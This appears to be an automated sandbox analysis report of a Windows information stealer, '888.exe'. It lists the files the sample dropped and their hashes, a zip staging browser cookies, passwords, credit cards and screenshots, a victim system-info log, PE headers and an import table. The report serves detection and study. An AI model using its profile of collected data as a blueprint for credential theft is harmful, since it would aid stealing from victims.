                                                                          SHA-512:4F5D81F917AF9968EDD292BEA64E9C07B64691ED2BF9CA0C15D5C6051AEE6C10EE49C88326E9C8C42D143533FA113DE1DD70FFF290351A408B5E0A3A6625F8E4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:@...e.................................O.........................
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                          Category:dropped
                                                                          Size (bytes):20480
                                                                          Entropy (8bit):0.6732424250451717
                                                                          Encrypted:false
                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):155648
                                                                          Entropy (8bit):0.5407252242845243
                                                                          Encrypted:false
                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8746135976761988
                                                                          Encrypted:false
                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                          Category:dropped
                                                                          Size (bytes):196608
                                                                          Entropy (8bit):1.121297215059106
                                                                          Encrypted:false
                                                                          SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                          MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                          SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                          SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                          SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                          Malicious:false
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                          Category:dropped
                                                                          Size (bytes):887832
                                                                          Entropy (8bit):7.525898020436918
                                                                          Encrypted:false
                                                                          SSDEEP:12288:aTiXtd8qjb8g7KuIDw7sRchNQyQAtR7p8Kl8TS03cW/EAoeNQAGOr1bMNJY8l7CN:DXtd8qj/B1kchNQlAtR24w7QLkcCN
                                                                          MD5:ECA8BE836DDA7C73E25894C29DE2FC80
                                                                          SHA1:6284094C3B710851DD0B1B8F1EFD22F09C143BDA
                                                                          SHA-256:7847776B2D0035963969419E4F810BF68645FE697B6E939DF66DE9A46066BBB1
                                                                          SHA-512:5FD8AD0CD8733C3E1E0940B17A492BD0C1B20C3BE441143171CA1AD18F2C496435C73521CCE76D5C7805267F87DE221A16184B292FB281D43B59EDB0C0A61B4D
                                                                          Malicious:false
                                                                          Preview:PK.........e.Y................Autofill/PK.........e.Y................Cookies/PK.........e.Y................CreditCards/PK.........e.Y................Downloads/PK.........e.Y................History/PK.........e.Y................Passwords/PK.........e.Y<V...@...@......screen1.png.PNG........IHDR................C..?.IDATx.....$I.$I.....GDDfffVUUUUwwwww......................................................................................twwwwWWUUUUffFFD......LfWwuwwO.....L...}..*y...'.y..+.l.%2.)ls....6..<...n.s...$I..?....6....m.#...B...6..a./......d..E.g.^..02.f....\f.I<.m....E....6...>...P..Ti.#.._C<'..{..~.a..f..F...m.-...l.f.oa.+.....m^..9..2...y....6...BI.6.yad./...\f....$.l.`..I..6...m.l#....~...@.l.y.4...s...c..tQ..s...m$!..D....M...\&..$.g........#3..$.2...$. ....6..L.".....`V;2..m.$q.. 3..@D ....6/.....6..."..`.G$....6..D..Mfb.IH"3....l.mZkd&.A.....$..m..!....6...M)..t].m.i""..m$.....$$......~....2M..I)....6....m$..H"....$$a....&3...$.$.....@...L.$!.$.d&.....2...6.
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):14994
                                                                          Entropy (8bit):7.827266198470604
                                                                          Encrypted:false
                                                                          SSDEEP:384:5kYnj06yZym7oWgYNxkYnj06yZym7oWgYNwb:5kYnjVmGgkYnjVmGJ
                                                                          MD5:DD8BA4DB578CDB1067257DA8383B7C44
                                                                          SHA1:06A673BC5DF871B4F651729DF45ACA3C734D79EA
                                                                          SHA-256:9B441D1D2314D00D8BB486781DE645F2F72E40FF1B54AA57FDFC7E319B09A3BC
                                                                          SHA-512:092714D4BEEBA414BEF583B5C9D08D88E53EB2F0A9A207DFEA3FB67865EB732D7AC1159BCA11584C48B46A5F5185CC053930F90D0571106C01BCCE81F99695E1
                                                                          Malicious:false
                                                                          Preview:PK.........e.Y...s............BJZFPPWAPT.docx..I.@!.D........8{....#.@.P.R..~}..t...npl....oTd..Q./.w!..w.C}.......C.5........B..f.79..=.zS...5.1.6.Y....z.N.|oEt...#o..P.y.+..-z..T.y...^c......pF.a..).Z.W.*[je=lm...]X5/.{......pi...c.XV....&*.+t..!..5d5fUpm....t......QQ.1.........F..c.........1..e.7G......QGU.sF4...:.T..:..6..ow.L16O....2..#Q..[.(.z.....3..W6...Q..1.JQ..f.............L0C].. ..&..6Yy}....).e.M,.{8..h'...=4...'..kg......l..W.-.<.....@r..b.p}.M7o...*.._z. l..G.K.}./..U<*..b.95N4J.....Omf.E..f..+...&...v......(I.....v..>.i..J.^.../.C.K..Y.....yr....].V..-...f<...E|).....t..~.t.F.o.g......U.Wa...W;.bM.V.M...,......2............?PK.........e.Yt..O............DUUDTUBZFW.pdf..I.e!....Q.RQ.P.../..75......s..N.0.....9k..M.F..s.x.cl.O~.P....k.H.}..:}u1..R5-}..>..:.2.."..<.\E...^E`....U.m.Y.*.....c..:.|....1....u.E.R.pw.Zt...D...52...........A....../"4.9.........0..1.}!Z.....W..&h.*t.....C.[.....,......!.-..R...XKP.a.rW.....0jLP
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):286
                                                                          Entropy (8bit):5.7588025104123
                                                                          Encrypted:false
                                                                          SSDEEP:6:PkU6WtDxbuQ0cKGWGcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAn:cU99EQ07BGcW1NOpFwUuQLHaU9WvHA
                                                                          MD5:07691E9F2983932701060D0FC5588075
                                                                          SHA1:878CA50CCD13F2DDA9C55B158B1D41F17636AA5A
                                                                          SHA-256:7F831E59CC96BDF3B1E0235B7D75201F2545F4F90DD43965E3B69B2FEFD9FD4E
                                                                          SHA-512:399B1FBA58B2CE804CF988C0C8E123477B43D0C4F426BCF1DA389D5C59BE9D03B640454E60D89D51DE5087E5601CBF591779884678279925552D7B8BD8EC6461
                                                                          Malicious:false
                                                                          Preview:.google.com.false./.true.13343492415760663.1P_JAR.2023-10-04-13...google.com.true./.true.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):868353
                                                                          Entropy (8bit):7.512401035123968
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BTiXtd8qjb8g7KuIDw7sRchNQyQAtR7p8Kl8TS03cW/EAoeNQAGOr1bMNJY8lb:8Xtd8qj/B1kchNQlAtR24w7QLkq
                                                                          MD5:CE20C349B432C15F92CEDE25CFC21FFA
                                                                          SHA1:9AD4EB12A796C735F4A4812A2DF4EF54868CC7B1
                                                                          SHA-256:9A270BD08E0EAAE89C41E5513E765CE0020A0EE1C5CEDC1C86E3211DEDF9A8E2
                                                                          SHA-512:612A2659A9C4CB930E18DCD3136820F66810213979026400848EEF70FA38D1686F866F2FEDFCC03DF06D26542F43CA6AF72CA96171600D5AFEEEFD8E8A9981F1
                                                                          Malicious:false
                                                                          Preview:
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):14994
                                                                          Entropy (8bit):7.827266198470604
                                                                          Encrypted:false
                                                                          SSDEEP:384:5kYnj06yZym7oWgYNxkYnj06yZym7oWgYNwb:5kYnjVmGgkYnjVmGJ
                                                                          MD5:DD8BA4DB578CDB1067257DA8383B7C44
                                                                          SHA1:06A673BC5DF871B4F651729DF45ACA3C734D79EA
                                                                          SHA-256:9B441D1D2314D00D8BB486781DE645F2F72E40FF1B54AA57FDFC7E319B09A3BC
                                                                          SHA-512:092714D4BEEBA414BEF583B5C9D08D88E53EB2F0A9A207DFEA3FB67865EB732D7AC1159BCA11584C48B46A5F5185CC053930F90D0571106C01BCCE81F99695E1
                                                                          Malicious:false
                                                                          Preview:PK zip archive (binary content omitted); member names visible in the header: BJZFPPWAPT.docx, DUUDTUBZFW.pdf
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:Unicode text, UTF-8 text, with CRLF, CR, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):717
                                                                          Entropy (8bit):5.32626050217476
                                                                          Encrypted:false
                                                                          SSDEEP:12:eM3lxmRQN3oi238Q8bjx6YjACrJFh9+lQM7NlVaZBQM3aWflIHdAMij01mMXaBLZ:eQNNYv38xxVjAI5XM7NlVaZe8lOAMijV
                                                                          MD5:E53295AB504E2E72AFDA52BB58E343D0
                                                                          SHA1:DD6A3D44C43D0233398779E4C11C0293D93EF9B0
                                                                          SHA-256:B14F35461C08944170211D7B6AEFE8217105716B0B59861DBDEBCA16A18FD56D
                                                                          SHA-512:0EF55005D2AF500F276DB06CAF6B8E911EFF6CE534B114C57F2F0193AE949B11DDCB4D2E3AD00D3DCC6BFCC2ABB5001FB6ECB0C22D992CA4162F5B5CF9F51850
                                                                          Malicious:false
                                                                          Preview:
                                                                          - IP Info -
                                                                          
                                                                          IP: 8.46.123.189
                                                                          Country: United States
                                                                          City: New York
                                                                          Postal: 10000
                                                                          ISP: Level - A3356
                                                                          Timezone: -05:00
                                                                          
                                                                          - PC Info -
                                                                          
                                                                          Username: user
                                                                          OS: Microsoft Windows 10 Pro
                                                                          CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz
                                                                          GPU: PGUZEPW (1280, 1024)
                                                                          HWID: 8671303959770644
                                                                          Current Language: English (United States)
                                                                          FileLocation: C:\Users\user\Desktop\888.exe
                                                                          Is Elevated: true
                                                                          
                                                                          - Other Info -
                                                                          
                                                                          Antivirus:
                                                                           - Windows Defender
                                                                          
                                                                          - Log Info -
                                                                          
                                                                          Build:_____
                                                                          
                                                                          Passwords:
                                                                          Cookies: 2
                                                                          Wallets:
                                                                          Files: 20
                                                                          Credit Cards:
                                                                          Servers FTP/SSH:
                                                                          Discord Tokens:
                                                                          Telegram:
                                                                          
                                                                          Tagged URLs:
                                                                          Tagged Cookies:
                                                                          
                                                                          Tags Passwords:
                                                                          Tags Cookies:
                                                                          Process:C:\Users\user\Desktop\888.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Preview:
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Entropy (8bit):6.549321465629513
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:888.exe
                                                                          File size:4'885'504 bytes
                                                                          MD5:b6e5859c20c608bf7e23a9b4f8b3b699
                                                                          SHA1:302a43d218e5fd4e766d8ac439d04c5662956cc3
                                                                          SHA256:bd5532a95156e366332a5ad57c97ca65a57816e702d3bf1216d4e09b899f3075
                                                                          SHA512:60c84125668bf01458347e029fdc374f02290ef1086645ae6d6d4ecadccb6555a2b955013f89d470d61d8251c7054a71b932d1207b68118ad82550c87168332c
                                                                          SSDEEP:98304:MUnvs+Q1S4tPjBjz7eO9C8LJ/INWoDBk:pPoljfT/J8
                                                                          TLSH:3C36AF82FAC342FED98B15B0202FB73FDB351D0E8214CB93EBD45D21E866712599A25D
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}C.t.C.t.C.t.J...Q.t.Ebq/d.t.Ebp/R.t.Ebw/W.t...u/U.t...u/@.t.C.u.k.t..bp/Y.t.C.t.G.t..bv/B.t.RichC.t.........PE..L.....Df...
                                                                          Icon Hash:00928e8e8686b000
                                                                          Entrypoint:0x746992
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x6644CE9A [Wed May 15 15:02:50 2024 UTC]
                                                                          TLS Callbacks:0x6116f0
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:6
                                                                          OS Version Minor:0
                                                                          File Version Major:6
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:6
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:2cf92bf8d9707fcbea09d995433c19b6
                                                                          Instruction
                                                                          call 00007F2E4CEB0ECEh
                                                                          jmp 00007F2E4CEB02B9h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ecx
                                                                          lea ecx, dword ptr [esp+04h]
                                                                          sub ecx, eax
                                                                          sbb eax, eax
                                                                          not eax
                                                                          and ecx, eax
                                                                          mov eax, esp
                                                                          and eax, FFFFF000h
                                                                          cmp ecx, eax
                                                                          jc 00007F2E4CEB044Ch
                                                                          mov eax, ecx
                                                                          pop ecx
                                                                          xchg eax, esp
                                                                          mov eax, dword ptr [eax]
                                                                          mov dword ptr [esp], eax
                                                                          ret
                                                                          sub eax, 00001000h
                                                                          test dword ptr [eax], eax
                                                                          jmp 00007F2E4CEB042Bh
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ebx
                                                                          push esi
                                                                          mov eax, dword ptr [esp+18h]
                                                                          or eax, eax
                                                                          jne 00007F2E4CEB045Ah
                                                                          mov ecx, dword ptr [esp+14h]
                                                                          mov eax, dword ptr [esp+10h]
                                                                          xor edx, edx
                                                                          div ecx
                                                                          mov ebx, eax
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          div ecx
                                                                          mov edx, ebx
                                                                          jmp 00007F2E4CEB0483h
                                                                          mov ecx, eax
                                                                          mov ebx, dword ptr [esp+14h]
                                                                          mov edx, dword ptr [esp+10h]
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          shr ecx, 1
                                                                          rcr ebx, 1
                                                                          shr edx, 1
                                                                          rcr eax, 1
                                                                          or ecx, ecx
                                                                          jne 00007F2E4CEB0436h
                                                                          div ebx
                                                                          mov esi, eax
                                                                          mul dword ptr [esp+18h]
                                                                          mov ecx, eax
                                                                          mov eax, dword ptr [esp+14h]
                                                                          mul esi
                                                                          add edx, ecx
                                                                          jc 00007F2E4CEB0450h
                                                                          cmp edx, dword ptr [esp+10h]
                                                                          jnbe 00007F2E4CEB044Ah
                                                                          jc 00007F2E4CEB0449h
                                                                          cmp eax, dword ptr [esp+0Ch]
                                                                          jbe 00007F2E4CEB0443h
                                                                          dec esi
                                                                          xor edx, edx
                                                                          mov eax, esi
                                                                          pop esi
                                                                          pop ebx
                                                                          retn 0010h
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          int3
                                                                          push ebx
                                                                          mov eax, dword ptr [esp+14h]
                                                                          or eax, eax
                                                                          jne 00007F2E4CEB045Ah
                                                                          mov ecx, dword ptr [esp+10h]
                                                                          mov eax, dword ptr [esp+0Ch]
                                                                          xor edx, edx
                                                                          div ecx
                                                                          mov eax, dword ptr [esp+08h]
                                                                          Programming Language:
                                                                          • [IMP] VS2008 SP1 build 30729
                                                                          Name                                  Virtual Address  Virtual Size  Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT          0x4883ac         0x1a4         .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC       0x491000         0x1b9b0       .reloc
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG           0x485b68         0x1c          .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS             0x485bc0         0x18          .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x485aa8         0x40          .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT             0x35a000         0x4c0         .rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                                                                          Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy            Characteristics
                                                                          .text   0x1000           0x358149      0x358200  58b136b0f6e324f2ea36c2001a61946a  unknown   unknown             unknown    unknown            IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata  0x35a000         0x130076      0x130200  c9dcd221b89f5ff0a86117992a3d645e  False     0.4299684674270448  data       5.926312917040969  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data   0x48b000         0x529c        0x4a00    cddfd669d1b848d82c68d8beaa9711ec  False     0.5308277027027027  Matlab v4 mat-file (little endian), numeric, rows 4394632, columns 0  5.058826172235092  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .reloc  0x491000         0x1b9b0       0x1ba00   f2f1f26ec7745ce120ed00fd5821e132  False     0.6490384615384616  data       6.68083376427154   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                          DLL                                 Import
                                                                          ntdll.dll                           NtCancelIoFileEx, NtCreateFile, NtWriteFile, NtReadFile, RtlNtStatusToDosError, NtDeviceIoControlFile, RtlCaptureContext, RtlUnwind
                                                                          kernel32.dll                        GetFileInformationByHandle, FlushFileBuffers, WakeConditionVariable, SleepConditionVariableSRW, GetModuleHandleA, GetProcAddress, GetCurrentThread, InitOnceBeginInitialize, TlsAlloc, InitOnceComplete, TlsFree, GetStdHandle, GetConsoleMode, MultiByteToWideChar, WriteConsoleW, CreateWaitableTimerExW, SetWaitableTimer, Sleep, QueryPerformanceCounter, QueryPerformanceFrequency, GetModuleHandleW, FormatMessageW, WaitForSingleObjectEx, WakeAllConditionVariable, GetCurrentProcess, GetCurrentProcessId, CreateMutexA, ReleaseMutex, GetEnvironmentVariableW, GetTempPathW, GetFileInformationByHandleEx, GetFullPathNameW, SetFilePointerEx, FindNextFileW, CreateDirectoryW, FindFirstFileW, FindClose, SetThreadStackGuarantee, SetFileCompletionNotificationModes, CreateIoCompletionPort, TryAcquireSRWLockExclusive, SetHandleInformation, GetEnvironmentStringsW, FreeEnvironmentStringsW, CompareStringOrdinal, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, DuplicateHandle, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, DeleteProcThreadAttributeList, CreateNamedPipeW, AddVectoredExceptionHandler, ReadFileEx, SleepEx, RaiseException, WaitForMultipleObjects, GetOverlappedResult, CreateEventW, CancelIo, ReadFile, ExitProcess, GetSystemTimeAsFileTime, GetCurrentDirectoryW, AcquireSRWLockShared, ReleaseSRWLockShared, DeleteFileW, CopyFileExW, PostQueuedCompletionStatus, GetQueuedCompletionStatusEx, UnhandledExceptionFilter, GetLastError, GetFinalPathNameByHandleW, SetLastError, GetSystemInfo, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, GetTickCount, MapViewOfFile, CreateFileMappingW, FormatMessageA, GetSystemTime, WideCharToMultiByte, FreeLibrary, SystemTimeToFileTime, GetFileSize, LockFileEx, LocalFree, UnlockFile, HeapDestroy, HeapCompact, LoadLibraryW, DeleteFileA, CreateFileA, FlushViewOfFile, OutputDebugStringW, GetFileAttributesExW, GetFileAttributesA, GetDiskFreeSpaceA, GetTempPathA, HeapSize, HeapValidate, UnmapViewOfFile, CreateMutexW, UnlockFileEx, SetEndOfFile, GetFullPathNameA, SetFilePointer, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, HeapCreate, AreFileApisANSI, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, DeleteCriticalSection, GetCurrentThreadId, SwitchToThread, SetFileInformationByHandle, GetModuleFileNameW, GetExitCodeProcess, CreateFileW, WaitForSingleObject, InitializeSListHead, TlsGetValue, TlsSetValue, GetProcessHeap, CreateThread, HeapAlloc, HeapReAlloc, CloseHandle, HeapFree, IsDebuggerPresent, EncodePointer, InitializeCriticalSectionAndSpinCount, LoadLibraryExW, LoadLibraryA, WriteFileEx
                                                                          user32.dll                          EnumDisplayMonitors, EnumDisplaySettingsExW, GetMonitorInfoW
                                                                          ws2_32.dll                          select, setsockopt, getaddrinfo, WSASocketW, freeaddrinfo, getsockopt, WSASend, accept, closesocket, ioctlsocket, WSAStartup, socket, getsockname, WSAGetLastError, getpeername, connect, WSACleanup, recv, shutdown, send, WSAIoctl, bind, listen
                                                                          bcrypt.dll                          BCryptGenRandom
                                                                          advapi32.dll                        RegCloseKey, AllocateAndInitializeSid, RegOpenKeyExW, SystemFunction036, FreeSid, CheckTokenMembership, RegQueryValueExW
                                                                          crypt32.dll                         CryptUnprotectData, CertEnumCertificatesInStore, CertVerifyCertificateChainPolicy, CertFreeCertificateChain, CertDuplicateCertificateChain, CertGetCertificateChain, CertFreeCertificateContext, CertCloseStore, CertDuplicateCertificateContext, CertOpenStore, CertDuplicateStore, CertAddCertificateContextToStore
                                                                          secur32.dll                         ApplyControlToken, AcquireCredentialsHandleA, QueryContextAttributesW, FreeCredentialsHandle, AcceptSecurityContext, DeleteSecurityContext, FreeContextBuffer, InitializeSecurityContextW, EncryptMessage, DecryptMessage
                                                                          oleaut32.dll                        SysFreeString, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayDestroy, SafeArrayUnaccessData, SysAllocStringLen, VariantClear
                                                                          rstrtmgr.dll                        RmStartSession, RmGetList, RmRegisterResources
                                                                          ole32.dll                           CoInitializeEx, CoSetProxyBlanket, CoCreateInstance, CoInitializeSecurity
                                                                          gdi32.dll                           SetStretchBltMode, StretchBlt, GetDIBits, GetObjectW, DeleteObject, CreateCompatibleDC, DeleteDC, GetDeviceCaps, CreateDCW, SelectObject, CreateCompatibleBitmap
                                                                          api-ms-win-crt-string-l1-1-0.dll    strcpy_s, strlen, strcmp, strcspn, strncmp, wcsncmp
                                                                          api-ms-win-crt-math-l1-1-0.dll      _dclass, log, ceil, pow, exp2f, __setusermatherr, roundf, truncf
                                                                          api-ms-win-crt-heap-l1-1-0.dll      malloc, realloc, _msize, _set_new_mode, free, calloc
                                                                          api-ms-win-crt-utility-l1-1-0.dll   qsort, _rotl64
                                                                          api-ms-win-crt-time-l1-1-0.dll      _localtime64_s
                                                                          api-ms-win-crt-runtime-l1-1-0.dll   _initterm, _crt_atexit, _initterm_e, exit, _configure_narrow_argv, _controlfp_s, _set_app_type, abort, __p___argc, _seh_filter_exe, _endthreadex, __p___argv, _cexit, _beginthreadex, _register_onexit_function, _c_exit, _register_thread_local_exe_atexit_callback, terminate, _get_initial_narrow_environment, _initialize_onexit_table, _exit, _initialize_narrow_environment
                                                                          api-ms-win-crt-stdio-l1-1-0.dll     __p__commode, _set_fmode
                                                                          api-ms-win-crt-locale-l1-1-0.dll    _configthreadlocale
Timestamp | Source Port | Dest Port | Source IP | Dest IP
